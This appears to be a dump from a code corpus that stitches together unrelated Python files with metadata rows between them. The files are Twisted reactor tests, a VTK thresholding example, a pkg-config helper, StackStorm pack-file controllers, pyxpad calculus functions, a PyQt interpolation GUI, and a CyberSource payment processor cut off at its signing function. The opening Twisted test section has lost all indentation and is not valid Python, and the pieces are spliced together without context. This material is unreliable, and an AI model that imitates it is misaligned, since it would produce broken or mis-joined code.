Any L{IReadDescriptors} in L{PosixReactorBase._internalReaders} are
left alone by L{PosixReactorBase._removeAll}.
"""
reactor = TrivialReactor()
extra = object()
reactor._internalReaders.add(extra)
reactor.addReader(extra)
reactor._removeAll(reactor._readers, reactor._writers)
self._checkWaker(reactor)
self.assertIn(extra, reactor._internalReaders)
self.assertIn(extra, reactor._readers)
def test_removeAllReturnsRemovedDescriptors(self):
"""
L{PosixReactorBase._removeAll} returns a list of removed
L{IReadDescriptor} and L{IWriteDescriptor} objects.
"""
reactor = TrivialReactor()
reader = object()
writer = object()
reactor.addReader(reader)
reactor.addWriter(writer)
removed = reactor._removeAll(
reactor._readers, reactor._writers)
self.assertEqual(set(removed), set([reader, writer]))
self.assertNotIn(reader, reactor._readers)
self.assertNotIn(writer, reactor._writers)
class TCPPortTests(TestCase):
"""
Tests for L{twisted.internet.tcp.Port}.
"""
if not isinstance(reactor, PosixReactorBase):
skip = "Non-posixbase reactor"
def test_connectionLostFailed(self):
"""
L{Port.stopListening} returns a L{Deferred} which errbacks if
L{Port.connectionLost} raises an exception.
"""
port = Port(12345, ServerFactory())
port.connected = True
port.connectionLost = lambda reason: 1 // 0
return self.assertFailure(port.stopListening(), ZeroDivisionError)
class TimeoutReportReactor(PosixReactorBase):
"""
A reactor which is just barely runnable and which cannot monitor any
readers or writers, and which fires a L{Deferred} with the timeout
passed to its C{doIteration} method as soon as that method is invoked.
"""
def __init__(self):
PosixReactorBase.__init__(self)
self.iterationTimeout = Deferred()
self.now = 100
def addReader(self, reader):
"""
Ignore the reader. This is necessary because the waker will be
added. However, we won't actually monitor it for any events.
"""
def removeAll(self):
"""
There are no readers or writers, so there is nothing to remove.
This will be called when the reactor stops, though, so it must be
implemented.
"""
return []
def seconds(self):
"""
Override the real clock with a deterministic one that can be easily
controlled in a unit test.
"""
return self.now
def doIteration(self, timeout):
d = self.iterationTimeout
if d is not None:
self.iterationTimeout = None
d.callback(timeout)
class IterationTimeoutTests(TestCase):
"""
Tests for the timeout argument L{PosixReactorBase.run} calls
L{PosixReactorBase.doIteration} with in the presence of various delayed
calls.
"""
def _checkIterationTimeout(self, reactor):
timeout = []
reactor.iterationTimeout.addCallback(timeout.append)
reactor.iterationTimeout.addCallback(lambda ignored: reactor.stop())
reactor.run()
return timeout[0]
def test_noCalls(self):
"""
If there are no delayed calls, C{doIteration} is called with a
timeout of C{None}.
"""
reactor = TimeoutReportReactor()
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, None)
def test_delayedCall(self):
"""
If there is a delayed call, C{doIteration} is called with a timeout
which is the difference between the current time and the time at
which that call is to run.
"""
reactor = TimeoutReportReactor()
reactor.callLater(100, lambda: None)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 100)
def test_timePasses(self):
"""
If a delayed call is scheduled and then some time passes, the
timeout passed to C{doIteration} is reduced by the amount of time
which passed.
"""
reactor = TimeoutReportReactor()
reactor.callLater(100, lambda: None)
reactor.now += 25
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 75)
def test_multipleDelayedCalls(self):
"""
If there are several delayed calls, C{doIteration} is called with a
timeout which is the difference between the current time and the
time at which the earlier of the two calls is to run.
"""
reactor = TimeoutReportReactor()
reactor.callLater(50, lambda: None)
reactor.callLater(10, lambda: None)
reactor.callLater(100, lambda: None)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 10)
def test_resetDelayedCall(self):
"""
If a delayed call is reset, the timeout passed to C{doIteration} is
based on the interval between the time when reset is called and the
new delay of the call.
"""
reactor = TimeoutReportReactor()
call = reactor.callLater(50, lambda: None)
reactor.now += 25
call.reset(15)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 15)
def test_delayDelayedCall(self):
"""
If a delayed call is re-delayed, the timeout passed to
C{doIteration} is based on the remaining time before the call would
have been made and the additional amount of time passed to the delay
method.
"""
reactor = TimeoutReportReactor()
call = reactor.callLater(50, lambda: None)
reactor.now += 10
call.delay(20)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 60)
def test_cancelDelayedCall(self):
"""
If the only delayed call is canceled, C{None} is the timeout passed
to C{doIteration}.
"""
reactor = TimeoutReportReactor()
call = reactor.callLater(50, lambda: None)
call.cancel()
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, None)
class ConnectedDatagramPortTestCase(TestCase):
"""
Test connected datagram UNIX sockets.
"""
if skipSockets is not None:
skip = skipSockets
def test_connectionFailedDoesntCallLoseConnection(self):
"""
L{ConnectedDatagramPort} does not call the deprecated C{loseConnection}
in L{ConnectedDatagramPort.connectionFailed}.
"""
def loseConnection():
"""
Dummy C{loseConnection} method. C{loseConnection} is deprecated and
should not get called.
"""
self.fail("loseConnection is deprecated and should not get called.")
port = unix.ConnectedDatagramPort(None, ClientProto())
port.loseConnection = loseConnection
port.connectionFailed("goodbye")
def test_connectionFailedCallsStopListening(self):
"""
L{ConnectedDatagramPort} calls L{ConnectedDatagramPort.stopListening}
instead of the deprecated C{loseConnection} in
L{ConnectedDatagramPort.connectionFailed}.
"""
self.called = False
def stopListening():
"""
Dummy C{stopListening} method.
"""
self.called = True
port = unix.ConnectedDatagramPort(None, ClientProto())
port.stopListening = stopListening
port.connectionFailed("goodbye")
self.assertEqual(self.called, True)
| bsd-3-clause | 2,376,887,156,229,777,400 | 29.315625 | 80 | 0.642202 | false |
RDeckers/ScientificVisualization-1TD389 | Assignments/Project/threshold_quakes_by_time.py | 1 | 1518 | """
This example shows how to create a vtkPolyData object with multiple
scalar attributes (strength and time), and how to efficiently extract
quakes within a specified time interval.
Author: Johan Nysjo
"""
import ReadPointsCSV
import vtk
# Load the earthquake data
points, strength, time_, = ReadPointsCSV.readPoints("events3.csv")
min_strength, max_strength = strength.GetRange()
min_time, max_time = time_.GetRange() # in seconds
# Assign unique names to the scalar arrays
strength.SetName("strength")
time_.SetName("time")
# Create a vtkPolyData object from the earthquake data and specify
# that "strength" should be the active scalar array
points_polydata = vtk.vtkPolyData()
points_polydata.SetPoints(points)
points_polydata.GetPointData().AddArray(strength)
points_polydata.GetPointData().AddArray(time_)
points_polydata.GetPointData().SetActiveScalars("strength")
# Threshold the earthquake points to extract all points within a
# specified time interval.
#
# If you do not specify which input array to process, i.e., if you
# comment out the SetInputArrayToProcess() call, the thresholding will
# be performed on the active scalar array ("strength", in this case).
threshold_filter = vtk.vtkThresholdPoints()
threshold_filter.SetInput(points_polydata)
threshold_filter.ThresholdBetween(min_time, max_time)
threshold_filter.SetInputArrayToProcess(0, 0, 0, 0, "time")
threshold_filter.Update()
# Connect the output of the threshold filter to a vtkGlyph3D filter
# and proceed with the visualization!
| gpl-3.0 | 4,511,994,350,035,439,600 | 33.5 | 70 | 0.784585 | false |
pni-libraries/python-pni | pkgconfig.py | 1 | 3517 |
from __future__ import print_function
import sys
try:
from subprocess import check_output
def execute(lt):
return check_output(lt)
except ImportError:
from subprocess import Popen
from subprocess import PIPE
def execute(lt):
p = Popen(lt, stdout=PIPE)
result = ""
for x in p.stdout:
result += x
return result
def strip_string_list(inlist):
"""
strip_string_list(inlist):
Strip all strings in a list of strings from all leading and
trailing blanks.
input arguments:
inlist ............ input list of strings
return:
new list with all strings stripped.
"""
lt = []
for value in inlist:
lt.append(value.strip())
return lt
def remove_empty_strings(inlist):
"""
remove_empty_strings(inlist):
Remove all empty strings from the list of strings.
input arguments:
inlist ............. inpust list of strings
return:
list without empty strings
"""
cnt = inlist.count('')
outlist = list(inlist)
for i in range(cnt):
outlist.remove('')
return outlist
def split_result(result, key):
result = result.strip()
result = result.split(key)
result = remove_empty_strings(result)
return result
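
# Illustration (hypothetical pkg-config output):
#   split_result('-I/usr/include -I/opt/include', '-I')
#   -> ['/usr/include ', '/opt/include']
# Trailing blanks are removed later by strip_string_list().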
class package(object):
command = 'pkg-config'
def __init__(self, pkgname):
self.name = pkgname
def _decode(self, data):
if sys.version_info.major >= 3:
return data.decode('utf-8')
else:
return data
def _get_library_dirs(self):
result = self._decode(
execute([self.command, '--libs-only-L', self.name]))
result = split_result(result, '-L')
return strip_string_list(result)
def _get_include_dirs(self):
result = self._decode(
execute([self.command, '--cflags-only-I', self.name]))
result = split_result(result, '-I')
return strip_string_list(result)
def _get_libraries(self):
result = self._decode(
execute([self.command, '--libs-only-l', self.name]))
result = split_result(result, '-l')
return strip_string_list(result)
def _get_compiler_flags(self):
# first we obtain all compiler flags
total_result = self._decode(
execute([self.command, '--cflags', self.name]))
total_result = total_result.strip()
total_result = total_result.split(" ")
total_result = remove_empty_strings(total_result)
# now we have to obtain all the include files
includes = self._decode(
execute([self.command, '--cflags-only-I', self.name]))
includes = includes.strip()
includes = includes.split(" ")
includes = remove_empty_strings(includes)
for header in includes:
total_result.remove(header)
return total_result
library_dirs = property(_get_library_dirs)
libraries = property(_get_libraries)
compiler_flags = property(_get_compiler_flags)
include_dirs = property(_get_include_dirs)
# testing routine
if __name__ == "__main__":
if len(sys.argv) < 2:
print("You have to pass a package name to as a command line argument!")
sys.exit()
name = sys.argv[1]
p = package(name)
print("library directories: ", p.library_dirs)
print("libraries : ", p.libraries)
print("compiler flags : ", p.compiler_flags)
print("include directories: ", p.include_dirs)
| gpl-2.0 | 9,147,892,070,350,756,000 | 23.943262 | 79 | 0.598521 | false |
tonybaloney/st2 | st2api/st2api/controllers/v1/packviews.py | 1 | 8858 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import codecs
import mimetypes
import os
import six
from wsgiref.handlers import format_date_time
from st2api.controllers.v1.packs import BasePacksController
from st2common.exceptions.db import StackStormDBObjectNotFoundError
from st2common import log as logging
from st2common.models.api.pack import PackAPI
from st2common.persistence.pack import Pack
from st2common.content.utils import get_pack_file_abs_path
from st2common.rbac.types import PermissionType
from st2common.rbac import utils as rbac_utils
from st2common.router import abort
from st2common.router import Response
http_client = six.moves.http_client
__all__ = [
'FilesController',
'FileController'
]
LOG = logging.getLogger(__name__)
BOM_LEN = len(codecs.BOM_UTF8)
# Maximum file size in bytes. If the file on disk is larger then this value, we don't include it
# in the response. This prevents DDoS / exhaustion attacks.
MAX_FILE_SIZE = (500 * 1000)
# File paths in the file controller for which RBAC checks are not performed
WHITELISTED_FILE_PATHS = [
'icon.png'
]
class BaseFileController(BasePacksController):
model = PackAPI
access = Pack
supported_filters = {}
query_options = {}
def get_all(self):
return abort(404)
def _get_file_size(self, file_path):
return self._get_file_stats(file_path=file_path)[0]
def _get_file_stats(self, file_path):
try:
file_stats = os.stat(file_path)
except OSError:
return (None, None)
return file_stats.st_size, file_stats.st_mtime
def _get_file_content(self, file_path):
with codecs.open(file_path, 'rb') as fp:
content = fp.read()
return content
def _process_file_content(self, content):
"""
This method processes the file content and removes unicode BOM character if one is present.
Note: If we don't do that, files view explodes with "UnicodeDecodeError: ... invalid start
byte" because the json.dump doesn't know how to handle BOM character.
"""
if content.startswith(codecs.BOM_UTF8):
content = content[BOM_LEN:]
return content
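
# _process_file_content, for illustration: b'\xef\xbb\xbf{"a": 1}' (a UTF-8 BOM
# followed by JSON) comes back as b'{"a": 1}'; content without a BOM is unchanged.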
class FilesController(BaseFileController):
"""
Controller which allows user to retrieve content of all the files inside the pack.
"""
def __init__(self):
super(FilesController, self).__init__()
self.get_one_db_method = self._get_by_ref_or_id
def get_one(self, ref_or_id, requester_user):
"""
Outputs the content of all the files inside the pack.
Handles requests:
GET /packs/views/files/<pack_ref_or_id>
"""
pack_db = self._get_by_ref_or_id(ref_or_id=ref_or_id)
rbac_utils.assert_user_has_resource_db_permission(user_db=requester_user,
resource_db=pack_db,
permission_type=PermissionType.PACK_VIEW)
if not pack_db:
msg = 'Pack with ref_or_id "%s" does not exist' % (ref_or_id)
raise StackStormDBObjectNotFoundError(msg)
pack_ref = pack_db.ref
pack_files = pack_db.files
result = []
for file_path in pack_files:
normalized_file_path = get_pack_file_abs_path(pack_ref=pack_ref, file_path=file_path)
if not normalized_file_path or not os.path.isfile(normalized_file_path):
# Ignore references to files which don't exist on disk
continue
file_size = self._get_file_size(file_path=normalized_file_path)
if file_size is not None and file_size > MAX_FILE_SIZE:
LOG.debug('Skipping file "%s" which size exceeds max file size (%s bytes)' %
(normalized_file_path, MAX_FILE_SIZE))
continue
content = self._get_file_content(file_path=normalized_file_path)
include_file = self._include_file(file_path=file_path, content=content)
if not include_file:
LOG.debug('Skipping binary file "%s"' % (normalized_file_path))
continue
item = {
'file_path': file_path,
'content': content
}
result.append(item)
return result
def _include_file(self, file_path, content):
"""
Method which returns True if the following file content should be included in the response.
Right now we exclude any file with UTF8 BOM character in it - those are most likely binary
files such as icon, etc.
"""
if codecs.BOM_UTF8 in content[:1024]:
return False
if "\0" in content[:1024]:
# Found null byte, most likely a binary file
return False
return True
class FileController(BaseFileController):
"""
Controller which allows user to retrieve content of a specific file in a pack.
"""
def get_one(self, ref_or_id, file_path, requester_user, if_none_match=None,
if_modified_since=None):
"""
Outputs the content of a specific file in a pack.
Handles requests:
GET /packs/views/file/<pack_ref_or_id>/<file path>
"""
pack_db = self._get_by_ref_or_id(ref_or_id=ref_or_id)
if not pack_db:
msg = 'Pack with ref_or_id "%s" does not exist' % (ref_or_id)
raise StackStormDBObjectNotFoundError(msg)
if not file_path:
raise ValueError('Missing file path')
pack_ref = pack_db.ref
# Note: Until list filtering is in place we don't require RBAC check for icon file
permission_type = PermissionType.PACK_VIEW
if file_path not in WHITELISTED_FILE_PATHS:
rbac_utils.assert_user_has_resource_db_permission(user_db=requester_user,
resource_db=pack_db,
permission_type=permission_type)
normalized_file_path = get_pack_file_abs_path(pack_ref=pack_ref, file_path=file_path)
if not normalized_file_path or not os.path.isfile(normalized_file_path):
# Ignore references to files which don't exist on disk
raise StackStormDBObjectNotFoundError('File "%s" not found' % (file_path))
file_size, file_mtime = self._get_file_stats(file_path=normalized_file_path)
response = Response()
if not self._is_file_changed(file_mtime,
if_none_match=if_none_match,
if_modified_since=if_modified_since):
response.status = http_client.NOT_MODIFIED
else:
if file_size is not None and file_size > MAX_FILE_SIZE:
msg = ('File %s exceeds maximum allowed file size (%s bytes)' %
(file_path, MAX_FILE_SIZE))
raise ValueError(msg)
content_type = mimetypes.guess_type(normalized_file_path)[0] or \
'application/octet-stream'
response.headers['Content-Type'] = content_type
response.body = self._get_file_content(file_path=normalized_file_path)
response.headers['Last-Modified'] = format_date_time(file_mtime)
response.headers['ETag'] = repr(file_mtime)
return response
def _is_file_changed(self, file_mtime, if_none_match=None, if_modified_since=None):
# For if_none_match check against what would be the ETAG value
if if_none_match:
return repr(file_mtime) != if_none_match
# For if_modified_since check against file_mtime
if if_modified_since:
return if_modified_since != format_date_time(file_mtime)
# Neither header is provided therefore assume file is changed.
return True
class PackViewsController(object):
files = FilesController()
file = FileController()
| apache-2.0 | -378,968,515,113,438,460 | 35.00813 | 99 | 0.623166 | false |
rafaelperazzo/iCalcNum | interpolacao.main.py | 1 | 10021 | # -*- coding: utf-8 -*-
import sys
import interpolacao as z
from interpolacaoUi import *
import numpy as np
import pylab as plt
from sympy import *
from PyQt4.QtGui import *
reload(sys)
sys.setdefaultencoding('utf8')
def str2list(texto):
resultado = map(float,texto.split())
if type(resultado) is list:
return True
else:
return False
def mensagem(tipo,titulo,texto,detalhes):
msg = QMessageBox()
if tipo==0:
msg.setIcon(QMessageBox.Information)
elif tipo==1:
msg.setIcon(QMessageBox.Warning)
elif tipo==2:
msg.setIcon(QMessageBox.Critical)
msg.setText(texto)
msg.setInformativeText(u'Informações adicionais')
msg.setWindowTitle(titulo)
msg.setDetailedText(detalhes)
msg.setStandardButtons(QMessageBox.Ok)
retval = msg.exec_()
def entradaValida():
input1 = False
input2 = False
input3 = False
input4 = False
input5 = False
if ui.txtX.text()!='':
input1 = True
if ui.txtY.text()!='':
input2 = True
if ui.txtPrecisao.text()!='':
input3 = True
if ui.txtPonto.text()!='':
input4 = True
if ui.txtQuantidade.text()!='':
input5 = True
try:
if not str2list(str(ui.txtX.text())):
input1 = False
if not str2list(str(ui.txtY.text())):
input2 = False
numerico = float(ui.txtPrecisao.text())
numerico = float(ui.txtPonto.text())
numerico = float(ui.txtQuantidade.text())
except ValueError as e:
input1 = False
if input1 and input2 and input3 and input4 and input5:
return True
else:
return False
def cmbMetodoChanged():
metodo = ui.cmbMetodo.currentIndex()
if metodo==0:
ui.txtPonto.setDisabled(True)
elif metodo==1:
ui.txtPonto.setDisabled(False)
elif metodo==2:
ui.txtPonto.setDisabled(False)
elif metodo==3:
ui.txtPonto.setDisabled(False)
#BUTTON CLICK HANDLER
def btnCalcularClick():
if entradaValida():
ui.txtResultado.clear()
eixoX = str(ui.txtX.text())
eixoX = map(float,eixoX.split())
eixoY = str(ui.txtY.text())
eixoY = map(float,eixoY.split())
precisao = int(ui.txtPrecisao.text())
        if ui.cmbMetodo.currentIndex()==0: #LEAST SQUARES
resultado = z.minimosQuadrados(eixoX,eixoY,precisao)
ui.txtResultado.append('***************')
ui.txtResultado.append('a0')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'a1')
ui.txtResultado.append('***************************')
ui.txtResultado.append(str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Função')
ui.txtResultado.append('***************')
ui.txtResultado.append('f(x)= ' + str(resultado[2]))
        elif ui.cmbMetodo.currentIndex()==1: #linear splines
ponto = float(ui.txtPonto.text())
resultado = z.splinesLineares(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append('Splines')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Índice')
ui.txtResultado.append('***************************')
ui.txtResultado.append('Utilizando o spline: ' + str(resultado[1]+1))
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Interpolação no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append('f(' + str(ponto) +')= ' + str(resultado[2]))
elif ui.cmbMetodo.currentIndex()==2: #LAGRANGE
ponto = float(ui.txtPonto.text())
resultado = z.lagrange(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append('Valor interpolado no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Polinômio não simplificado')
ui.txtResultado.append('***************************')
ui.txtResultado.append('f(x)= ' + str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append('SIMPLIFICANDO')
ui.txtResultado.append('***************')
ui.txtResultado.append(pretty(resultado[2],use_unicode=True))
        else: #DIVIDED DIFFERENCES
ponto = float(ui.txtPonto.text())
resultado = z.newton(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Diferenças divididas')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[3]))
ui.txtResultado.append('***************')
ui.txtResultado.append('Valor interpolado no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Polinômio não simplificado')
ui.txtResultado.append('***************************')
#expressao = sympify(resultado[1])
#expressao = pretty(expressao,use_unicode=False)
#print expressao
#ui.txtResultado.append(expressao)
ui.txtResultado.append('f(x)= ' + str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append('SIMPLIFICANDO')
ui.txtResultado.append('***************')
ui.txtResultado.append(pretty(resultado[2],use_unicode=True))
#print(resultado[3])
#print(resultado[1])
else:
#QMessageBox.critical(None,'Erro!',u'Entrada Inválida!',QMessageBox.Ok)
mensagem(2,u'Erro!',u'Entrada inválida!',u'Os dados de entrada devem ser numéricos!')
def btnVerGraficoClick():
btnCalcularClick()
eixoX = str(ui.txtX.text())
eixoX = map(float,eixoX.split())
eixoY = str(ui.txtY.text())
eixoY = map(float,eixoY.split())
precisao = int(ui.txtPrecisao.text())
if ui.cmbMetodo.currentIndex()==0:
funcao = z.minimosQuadrados(eixoX,eixoY,precisao)[2]
elif ui.cmbMetodo.currentIndex()==2:
funcao = z.lagrange(eixoX,eixoY,precisao,1)[2]
elif ui.cmbMetodo.currentIndex()==3:
funcao = z.newton(eixoX,eixoY,precisao,1)[2]
else:
ponto = float(ui.txtPonto.text())
resultado = z.splinesLineares(eixoX,eixoY,precisao,ponto)
indice = resultado[1]
funcao = resultado[0][indice]
#QMessageBox.information(None,u'Informação',u'Função ainda não disponível.',QMessageBox.Ok)
if ui.cmbMetodo.currentIndex()==1:
figure = plt.figure(1)
ax1 = figure.add_subplot(111)
ax1.axhline(linewidth=4,color="black")
ax1.axvline(linewidth=4,color="black")
plt.grid(True)
fx, = plt.plot(eixoX,eixoY, 'r',label='f(x)',color='k',linewidth=2.0)
#dx, = plt.plot(x,y2,'r', label='f\'(x)',color='k',linewidth=1.0)
plt.show()
else:
funcao = str(funcao)
x=np.linspace(min(eixoX),max(eixoX),100)
y2 = eval(funcao)
figure = plt.figure(1)
ax1 = figure.add_subplot(111)
ax1.axhline(linewidth=4,color="black")
ax1.axvline(linewidth=4,color="black")
plt.grid(True)
#plt.xlim(min(eixoX),max(eixoX))
#plt.ylim(min(eixoY),max(eixoY))
fx, = plt.plot(eixoX,eixoY, 'ro',label='f(x)',color='k',linewidth=2.0)
dx, = plt.plot(x,y2,'r', label='f\'(x)',color='k',linewidth=1.0)
plt.show()
#janela = Window(window,eixoX,eixoY,str(funcao))
#janela.setAttribute(QtCore.Qt.WA_DeleteOnClose,True)
#janela.exec_()
def sair():
quit()
def btnAleatorioClick():
tamanho = int(ui.txtQuantidade.text())+1
listaX = []
listaY=[]
for i in range(1,tamanho,1):
x = np.random.randint(0,30)
y = np.random.randint(0,50)
while x in listaX:
x = np.random.randint(0,30)
while y in listaY:
            y = np.random.randint(0,50)
listaX.append(x)
listaY.append(y)
lX = str(listaX)
lY = str(listaY)
lX = lX.replace('[','')
lX = lX.replace(',',' ')
lX = lX.replace(']','')
lY = lY.replace('[','')
lY = lY.replace(',',' ')
lY = lY.replace(']','')
ui.txtX.setText(lX)
ui.txtY.setText(lY)
def salvar():
fileName = QFileDialog.getSaveFileName(None, "Salvar Como")
if (fileName!=''):
f = open(fileName,'w')
resultado = str(ui.txtX.text()) + '\n' + str(ui.txtY.text()) + '\n'
resultado = resultado + str(ui.txtResultado.toPlainText()) + '\n'
f.write(resultado)
f.close()
#STARTING THE APPLICATION
app = QApplication(sys.argv)
#CREATING THE MAIN WINDOW
window = QMainWindow()
ui = Ui_interpolacaoPrincipal()
ui.setupUi(window)
#CONNECTING BUTTON CLICKS TO THE FUNCTIONS ABOVE
ui.btnCalcular.clicked.connect(btnCalcularClick)
ui.btnGrafico.clicked.connect(btnVerGraficoClick)
ui.btnAleatorios.clicked.connect(btnAleatorioClick)
#ui.actionSair.triggered.connect(sair)
ui.cmbMetodo.currentIndexChanged.connect(cmbMetodoChanged)
ui.actionSalvarComo.triggered.connect(salvar)
window.show()
sys.exit(app.exec_())
| gpl-3.0 | 3,902,660,676,013,172,000 | 36.732075 | 99 | 0.563256 | false |
bendudson/pyxpad | pyxpad/calculus.py | 1 | 1993 | """
Calculus on XPadDataItem objects
"""
from .pyxpad_utils import XPadDataItem
from numpy import zeros, cumsum
def integrate(item):
"""
Integrate the given trace
Inputs
------
item - an XPadDataItem object (or equivalent)
Returns
-------
an XPadDataItem object
"""
if len(item.dim) != 1:
raise ValueError("Can only integrate 1D traces currently")
# Create a result
result = XPadDataItem()
if item.name != "":
result.name = "INTG( "+item.name+" )"
result.source = item.source
if item.label != "":
result.label = "INTG( "+item.label+" )"
if item.units != "":
result.units = item.units+"*"+item.dim[0].units
result.data = zeros(item.data.shape)
time = item.dim[0].data
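    # Cumulative trapezoidal rule: each step adds 0.5*(t[i]-t[i-1])*(f[i]+f[i-1])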
result.data[1:] = cumsum(0.5*(time[1:]-time[0:-1])*(item.data[1:] + item.data[0:-1]))
result.dim = item.dim
result.order = item.order
result.time = item.time
return result
def differentiate(item):
"""
Differentiates the given trace
Inputs
------
item - an XPadDataItem object (or equivalent)
Returns
-------
an XPadDataItem object
"""
if len(item.dim) != 1:
raise ValueError("Can only differentiate 1D traces")
# Create a result
result = XPadDataItem()
if item.name != "":
result.name = "Diff(" + item.name + ")"
result.source = item.source
if item.label != "":
result.label = "Diff(" + item.label + ")"
if item.units != "":
result.units = item.units + item.dim[0].units + chr(0x207B) + chr(0x00B9)
result.dim = item.dim
result.order = item.order
result.time = item.time
time = item.dim[item.order].data
result.data = zeros(len(item.data))
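    # Central differences in the interior; the endpoints copy their neighbours below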
for i in range(1, len(result.data)-1):
result.data[i] = (item.data[i+1]-item.data[i-1])/(time[i+1]-time[i-1])
result.data[-1] = result.data[-2]
result.data[0] = result.data[1]
return result
| gpl-3.0 | -439,367,664,206,884,740 | 20.202128 | 89 | 0.583041 | false |
nttks/edx-platform | lms/djangoapps/shoppingcart/processors/CyberSource2.py | 1 | 28440 | """
Implementation of the CyberSource credit card processor using the newer "Secure Acceptance API".
The previous Hosted Order Page API is being deprecated as of 9/14.
For now, we're keeping the older implementation in the code-base so we can
quickly roll-back by updating the configuration. Eventually, we should replace
the original implementation with this version.
To enable this implementation, add the following Django settings:
CC_PROCESSOR_NAME = "CyberSource2"
CC_PROCESSOR = {
"CyberSource2": {
"SECRET_KEY": "<secret key>",
"ACCESS_KEY": "<access key>",
"PROFILE_ID": "<profile ID>",
"PURCHASE_ENDPOINT": "<purchase endpoint>"
}
}
"""
import hmac
import binascii
import re
import json
import uuid
import logging
from textwrap import dedent
from datetime import datetime
from collections import OrderedDict, defaultdict
from decimal import Decimal, InvalidOperation
from hashlib import sha256
from django.conf import settings
from django.utils.translation import ugettext as _, ugettext_noop
from edxmako.shortcuts import render_to_string
from shoppingcart.models import Order
from shoppingcart.processors.exceptions import *
from shoppingcart.processors.helpers import get_processor_config
from microsite_configuration import microsite
log = logging.getLogger(__name__)
# Translators: this text appears when an unfamiliar error code occurs during payment,
# for which we don't know a user-friendly message to display in advance.
DEFAULT_REASON = ugettext_noop("UNKNOWN REASON")
def process_postpay_callback(params):
"""
Handle a response from the payment processor.
Concrete implementations should:
1) Verify the parameters and determine if the payment was successful.
2) If successful, mark the order as purchased and call `purchased_callbacks` of the cart items.
3) If unsuccessful, try to figure out why and generate a helpful error message.
4) Return a dictionary of the form:
{'success': bool, 'order': Order, 'error_html': str}
Args:
params (dict): Dictionary of parameters received from the payment processor.
Keyword Args:
Can be used to provide additional information to concrete implementations.
Returns:
dict
"""
try:
valid_params = verify_signatures(params)
result = _payment_accepted(
valid_params['req_reference_number'],
valid_params['auth_amount'],
valid_params['req_currency'],
valid_params['decision']
)
if result['accepted']:
_record_purchase(params, result['order'])
return {
'success': True,
'order': result['order'],
'error_html': ''
}
else:
_record_payment_info(params, result['order'])
return {
'success': False,
'order': result['order'],
'error_html': _get_processor_decline_html(params)
}
except CCProcessorException as error:
log.exception('error processing CyberSource postpay callback')
# if we have the order and the id, log it
if hasattr(error, 'order'):
_record_payment_info(params, error.order)
else:
log.info(json.dumps(params))
return {
'success': False,
'order': None, # due to exception we may not have the order
'error_html': _get_processor_exception_html(error)
}
def processor_hash(value):
"""
Calculate the base64-encoded, SHA-256 hash used by CyberSource.
Args:
value (string): The value to encode.
Returns:
string
"""
secret_key = get_processor_config().get('SECRET_KEY', '')
hash_obj = hmac.new(secret_key.encode('utf-8'), value.encode('utf-8'), sha256)
return binascii.b2a_base64(hash_obj.digest())[:-1] # last character is a '\n', which we don't want
def verify_signatures(params):
"""
Use the signature we receive in the POST back from CyberSource to verify
the identity of the sender (CyberSource) and that the contents of the message
have not been tampered with.
Args:
params (dictionary): The POST parameters we received from CyberSource.
Returns:
dict: Contains the parameters we will use elsewhere, converted to the
appropriate types
Raises:
CCProcessorSignatureException: The calculated signature does not match
the signature we received.
CCProcessorDataException: The parameters we received from CyberSource were not valid
(missing keys, wrong types)
"""
# First see if the user cancelled the transaction
# if so, then not all parameters will be passed back so we can't yet verify signatures
if params.get('decision') == u'CANCEL':
raise CCProcessorUserCancelled()
# if the user decline the transaction
# if so, then auth_amount will not be passed back so we can't yet verify signatures
if params.get('decision') == u'DECLINE':
raise CCProcessorUserDeclined()
# Validate the signature to ensure that the message is from CyberSource
# and has not been tampered with.
signed_fields = params.get('signed_field_names', '').split(',')
data = u",".join([u"{0}={1}".format(k, params.get(k, '')) for k in signed_fields])
returned_sig = params.get('signature', '')
if processor_hash(data) != returned_sig:
raise CCProcessorSignatureException()
    # Validate that we have the parameters we expect and can convert them
# to the appropriate types.
# Usually validating the signature is sufficient to validate that these
# fields exist, but since we're relying on CyberSource to tell us
# which fields they included in the signature, we need to be careful.
valid_params = {}
required_params = [
('req_reference_number', int),
('req_currency', str),
('decision', str),
('auth_amount', Decimal),
]
for key, key_type in required_params:
if key not in params:
raise CCProcessorDataException(
_(
u"The payment processor did not return a required parameter: {parameter}"
).format(parameter=key)
)
try:
valid_params[key] = key_type(params[key])
except (ValueError, TypeError, InvalidOperation):
raise CCProcessorDataException(
_(
u"The payment processor returned a badly-typed value {value} for parameter {parameter}."
).format(value=params[key], parameter=key)
)
return valid_params
def sign(params):
"""
Sign the parameters dictionary so CyberSource can validate our identity.
